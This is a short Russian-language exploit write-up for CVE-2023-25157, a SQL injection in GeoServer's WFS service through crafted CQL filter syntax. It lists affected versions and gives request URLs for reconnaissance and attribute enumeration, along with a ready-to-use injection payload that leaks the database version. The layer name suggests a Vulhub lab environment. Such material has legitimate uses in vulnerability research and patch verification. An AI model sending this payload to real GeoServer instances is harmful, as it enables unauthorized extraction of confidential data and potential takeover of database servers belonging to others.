
Эксплойт для CVE-2023-25157: SQL-инъекция в сервисе WFS GeoServer через специально сформированный синтаксис фильтра CQL, позволяющая неавторизованное удалённое извлечение данных и потенциальную компрометацию сервера базы данных.
Из-за отсутствия фильтрации пользовательского ввода удалённый неавторизованный злоумышленник может сформировать некорректный синтаксис фильтра, обойти лексический анализ GeoServer и вызвать SQL-инъекцию, получить доступ к конфиденциальной информации на сервере и даже получить права на сервере базы данных.
GeoServer 2.20.x < 2.20.7
GeoServer 2.19.x < 2.19.7
GeoServer 2.18.x < 2.18.7
GeoServer 2.21.x < 2.21.4
GeoServer 2.22.x < 2.22.2
Поиск
/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities

Получение соответствующих атрибутов для типа объекта vulhub:example
/geoserver/wfs?request=DescribeFeatureType&version=2.0.0&service=WFS&outputFormat=application/json&typeName=vulhub:example

/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith(name,'x'')+=+true+and+1=(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+')+=+true



